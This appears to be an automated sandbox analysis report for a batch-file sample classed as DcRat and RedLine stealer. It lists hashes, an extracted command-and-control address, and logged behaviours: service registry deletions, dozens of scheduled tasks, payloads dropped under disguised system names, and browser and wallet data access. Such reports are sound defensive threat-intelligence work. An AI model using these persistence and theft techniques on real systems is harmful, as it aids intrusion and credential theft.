dcrat | 95ac6e414cd46ab5ec8d652944120157bedb5a6373efc5ee34656b0d0e6ed9ef

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
29-08-2022 10:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

StarPredict.bat
Size

24KB
MD5

a4a8c94e504ac6ca0ab89e9602757b7d
SHA1

b6e014f2ee929e6522c2f88cef198e8488d1b076
SHA256

95ac6e414cd46ab5ec8d652944120157bedb5a6373efc5ee34656b0d0e6ed9ef
SHA512

29dd2a53d7cad6440c58b30702517796565f8b91d837cf7ad12b29a4f831c32a7011eefb19868048c04f500ca726e6313574b178baea54cb4944a2878e917fa8
SSDEEP

384:XjkB9T5RQ04oNa0VVP/7hdD4HO6oboIsR6a5toa9nb8QbUNFu8BHirCtc:g9TDQ0rD8obYD5tnAbTliEc

Score

10^/10

dcrat redline dv discovery evasion exploit infostealer rat spyware stealer

Malware Config

Extracted

Family

redline

Botnet

195.3.223.79:65252

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

Process spawned unexpected child process 42 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2136	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5108	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4084	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1844	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4948	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2420	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1760	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4080	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4776	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2468	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2184	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1568	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3972	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4340	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1884	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4856	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3244	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4068	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	644	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4884	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2980	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4192	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2092	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4500	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1300	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5116	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4976	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4920	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	632	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	64	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2700	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1804	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	388	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4792	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4880	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	840	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4180	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1276	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1088	4380	schtasks.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\AntiVm.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\AntiVm.exe	family_redline
behavioral2/memory/3828-162-0x0000000000310000-0x000000000032E000-memory.dmp	family_redline

DCRat payload 7 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\AntiVPS.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\AntiVPS.exe	dcrat
C:\portsurrogateproviderIntobroker\Perfmonitor.exe	dcrat
C:\portsurrogateproviderIntobroker\Perfmonitor.exe	dcrat
behavioral2/memory/2792-178-0x0000000000780000-0x0000000000A52000-memory.dmp	dcrat
C:\Recovery\WindowsRE\dwm.exe	dcrat
C:\Recovery\WindowsRE\dwm.exe	dcrat

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exeschtasks.exe

flow pid process

5 4184 powershell.exe
22 1256 schtasks.exe
24 1256 schtasks.exe
29 1256 schtasks.exe
31 1256 schtasks.exe
32 1256 schtasks.exe
Downloads MZ/PE file

flow	pid	process
5	4184	powershell.exe
22	1256	schtasks.exe
24	1256	schtasks.exe
29	1256	schtasks.exe
31	1256	schtasks.exe
32	1256	schtasks.exe

Drops file in Drivers directory 2 IoCs

Processes:

updaterchr.exeMsPopUp.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updaterchr.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	MsPopUp.exe

Executes dropped EXE 8 IoCs

Processes:

StarPredict.bat.exeAntiVm.exeAntiVPS.exeMsPopUp.exePerfmonitor.exeupdaterchr.exedwm.exeexplorer.exe

pid process

4924 StarPredict.bat.exe
3828 AntiVm.exe
3468 AntiVPS.exe
3632 MsPopUp.exe
2792 Perfmonitor.exe
5052 updaterchr.exe
4796 dwm.exe
3248 explorer.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2760 takeown.exe
4604 icacls.exe
1964 takeown.exe
5084 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2760	takeown.exe
4604	icacls.exe
1964	takeown.exe
5084	icacls.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AntiVPS.exeWScript.exePerfmonitor.exedwm.exeStarPredict.bat.exeMsPopUp.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	AntiVPS.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Perfmonitor.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	dwm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	StarPredict.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	MsPopUp.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2760 takeown.exe
4604 icacls.exe
1964 takeown.exe
5084 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

41 ipinfo.io
43 ipinfo.io

pid	process
2760	takeown.exe
4604	icacls.exe
1964	takeown.exe
5084	icacls.exe

flow	ioc
41	ipinfo.io
43	ipinfo.io

Drops file in System32 directory 5 IoCs

Processes:

powershell.exepowershell.exeupdaterchr.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\5D72.tmp	updaterchr.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updaterchr.exe.log	updaterchr.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

updaterchr.exe

description pid process target process

PID 5052 set thread context of 3248 5052 updaterchr.exe explorer.exe

description	pid	process	target process
PID 5052 set thread context of 3248	5052	updaterchr.exe	explorer.exe

Drops file in Program Files directory 27 IoCs

Processes:

Perfmonitor.exeMsPopUp.exeupdaterchr.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Windows Media Player\Network Sharing\MsPopUp.exe	Perfmonitor.exe
File created	C:\Program Files\Google\Chrome\updaterchr.exe	MsPopUp.exe
File created	C:\Program Files (x86)\Windows Media Player\Network Sharing\27e1144e21c1ad	Perfmonitor.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe	Perfmonitor.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\logs\explorer.exe	Perfmonitor.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\RCXD379.tmp	Perfmonitor.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\hrtfs\SearchApp.exe	Perfmonitor.exe
File opened for modification	C:\Program Files\Uninstall Information\RCXCE56.tmp	Perfmonitor.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\Network Sharing\RCXE030.tmp	Perfmonitor.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\5b884080fd4f94	Perfmonitor.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\hrtfs\RCXC411.tmp	Perfmonitor.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updaterchr.exe
File created	C:\Program Files\VideoLAN\VLC\hrtfs\SearchApp.exe	Perfmonitor.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\7a0fd90576e088	Perfmonitor.exe
File created	C:\Program Files\Uninstall Information\fontdrvhost.exe	Perfmonitor.exe
File opened for modification	C:\Program Files\Google\Chrome\updaterchr.exe	MsPopUp.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe	Perfmonitor.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\088424020bedd6	Perfmonitor.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fontdrvhost.exe	Perfmonitor.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\RCXD87C.tmp	Perfmonitor.exe
File created	C:\Program Files\VideoLAN\VLC\hrtfs\38384e6a620884	Perfmonitor.exe
File opened for modification	C:\Program Files\Uninstall Information\fontdrvhost.exe	Perfmonitor.exe
File created	C:\Program Files\Uninstall Information\5b884080fd4f94	Perfmonitor.exe
File created	C:\Program Files (x86)\Windows Media Player\Network Sharing\MsPopUp.exe	Perfmonitor.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\logs\RCXCBC5.tmp	Perfmonitor.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\explorer.exe	Perfmonitor.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fontdrvhost.exe	Perfmonitor.exe

Drops file in Windows directory 5 IoCs

Processes:

Perfmonitor.exe

description	ioc	process
File created	C:\Windows\AppReadiness\dllhost.exe	Perfmonitor.exe
File created	C:\Windows\AppReadiness\5940a34987c991	Perfmonitor.exe
File created	C:\Windows\servicing\cmd.exe	Perfmonitor.exe
File opened for modification	C:\Windows\AppReadiness\RCXDD8F.tmp	Perfmonitor.exe
File opened for modification	C:\Windows\AppReadiness\dllhost.exe	Perfmonitor.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2412 sc.exe
4736 sc.exe
1480 sc.exe
2192 sc.exe
4936 sc.exe
3644 sc.exe
3868 sc.exe
3060 sc.exe
1440 sc.exe
2208 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
2412	sc.exe
4736	sc.exe
1480	sc.exe
2192	sc.exe
4936	sc.exe
3644	sc.exe
3868	sc.exe
3060	sc.exe
1440	sc.exe
2208	sc.exe

Creates scheduled task(s) 1 TTPs 42 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
2980	schtasks.exe
64	schtasks.exe
4776	schtasks.exe
3972	schtasks.exe
4884	schtasks.exe
1568	schtasks.exe
4340	schtasks.exe
4976	schtasks.exe
4880	schtasks.exe
1276	schtasks.exe
5108	schtasks.exe
4084	schtasks.exe
2420	schtasks.exe
4792	schtasks.exe
1760	schtasks.exe
4192	schtasks.exe
2700	schtasks.exe
4948	schtasks.exe
2028	schtasks.exe
840	schtasks.exe
4180	schtasks.exe
4080	schtasks.exe
4068	schtasks.exe
5116	schtasks.exe
4856	schtasks.exe
644	schtasks.exe
1300	schtasks.exe
632	schtasks.exe
1804	schtasks.exe
2136	schtasks.exe
2468	schtasks.exe
1884	schtasks.exe
3016	schtasks.exe
1088	schtasks.exe
3244	schtasks.exe
1584	schtasks.exe
4500	schtasks.exe
4920	schtasks.exe
388	schtasks.exe
1844	schtasks.exe
2184	schtasks.exe
2092	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exeexplorer.exeupdaterchr.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	updaterchr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Modifies registry class 3 IoCs

Processes:

AntiVPS.exePerfmonitor.exedwm.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	AntiVPS.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	Perfmonitor.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	dwm.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
3608	reg.exe
1452	reg.exe
3012	reg.exe
4192	reg.exe
3636	reg.exe
1452	reg.exe
1568	reg.exe
2180	reg.exe
4204	reg.exe
2640	reg.exe
4916	reg.exe
3476	reg.exe
524	reg.exe
1156	reg.exe
2348	reg.exe
3996	reg.exe
2624	reg.exe
1100	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

StarPredict.bat.exepowershell.exepowershell.exepowershell.exePerfmonitor.exeAntiVm.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exereg.exepowercfg.exepowershell.exeMsPopUp.exepowershell.exedwm.exe

pid	process
4924	StarPredict.bat.exe
4924	StarPredict.bat.exe
4184	powershell.exe
4184	powershell.exe
212	powershell.exe
212	powershell.exe
4688	powershell.exe
4688	powershell.exe
2792	Perfmonitor.exe
2792	Perfmonitor.exe
2792	Perfmonitor.exe
3828	AntiVm.exe
3828	AntiVm.exe
4732	powershell.exe
4732	powershell.exe
4800	powershell.exe
4800	powershell.exe
2236	powershell.exe
2236	powershell.exe
1368	powershell.exe
1368	powershell.exe
5112	powershell.exe
5112	powershell.exe
4080	powershell.exe
4080	powershell.exe
3132	powershell.exe
3132	powershell.exe
1848	powershell.exe
1848	powershell.exe
1552	powershell.exe
1552	powershell.exe
4084	powershell.exe
4084	powershell.exe
4800	powershell.exe
2236	powershell.exe
4500	powershell.exe
4500	powershell.exe
4500	powershell.exe
4916	reg.exe
4916	reg.exe
3244	powercfg.exe
3244	powercfg.exe
2508	powershell.exe
2508	powershell.exe
1848	powershell.exe
5112	powershell.exe
4084	powershell.exe
1368	powershell.exe
1368	powershell.exe
1552	powershell.exe
3132	powershell.exe
4080	powershell.exe
3244	powercfg.exe
4916	reg.exe
2508	powershell.exe
3632	MsPopUp.exe
3632	MsPopUp.exe
2412	powershell.exe
2412	powershell.exe
4796	dwm.exe
4796	dwm.exe
4796	dwm.exe
4796	dwm.exe
4796	dwm.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

dwm.exe

pid process

4796 dwm.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

664

pid	process
4796	dwm.exe

pid	process
664

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

StarPredict.bat.exepowershell.exepowershell.exepowershell.exeAntiVm.exePerfmonitor.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exewmiprvse.exe

description	pid	process
Token: SeDebugPrivilege	4924	StarPredict.bat.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	212	powershell.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	3828	AntiVm.exe
Token: SeDebugPrivilege	2792	Perfmonitor.exe
Token: SeShutdownPrivilege	1004	powercfg.exe
Token: SeCreatePagefilePrivilege	1004	powercfg.exe
Token: SeShutdownPrivilege	4956	powercfg.exe
Token: SeCreatePagefilePrivilege	4956	powercfg.exe
Token: SeShutdownPrivilege	4256	powercfg.exe
Token: SeCreatePagefilePrivilege	4256	powercfg.exe
Token: SeShutdownPrivilege	1424	powercfg.exe
Token: SeCreatePagefilePrivilege	1424	powercfg.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeTakeOwnershipPrivilege	2760	wmiprvse.exe
Token: SeIncreaseQuotaPrivilege	4732	powershell.exe
Token: SeSecurityPrivilege	4732	powershell.exe
Token: SeTakeOwnershipPrivilege	4732	powershell.exe
Token: SeLoadDriverPrivilege	4732	powershell.exe
Token: SeSystemProfilePrivilege	4732	powershell.exe
Token: SeSystemtimePrivilege	4732	powershell.exe
Token: SeProfSingleProcessPrivilege	4732	powershell.exe
Token: SeIncBasePriorityPrivilege	4732	powershell.exe
Token: SeCreatePagefilePrivilege	4732	powershell.exe
